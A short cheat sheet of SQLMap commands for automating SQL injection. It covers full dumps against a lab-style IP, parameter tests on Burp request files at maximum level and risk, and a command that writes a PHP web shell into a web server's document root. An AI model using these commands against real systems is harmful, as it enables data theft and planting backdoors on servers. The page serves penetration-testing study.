SQLMap
SQLMap is a tool that can be used to automate scanning and exploiting of SQL Injection.
Below is some examples using SQLMap.
1 2 |
sqlmap -u “http://10.10.10.63/?id=” -a |
In below examle the scan is based on login.req which is the HTTP captured and exported from Burp Suite.
1 2 3 4 5 6 7 8 9 |
# -p switch is parameters to test sqlmap -r login.req –level 5 –risk 3 –string “wrong identification”-p username,password # -batch switch is to run the test without prompting sqlmap -r complain.req –batch –level 5 –risk 3 –string “Incorrect datetime value: ‘’ for column ‘close_date’ at row 1” –dbms mysql -p compTitle,compDesc # Following uploads a PHP script to a writeable location. sqlmap -r login_web_sqli.req –risk=3 –level=5 -p username –dbms=MySQL –file-write=”/root/phpshells/weeve.php” –file-dest=”/var/www/html” |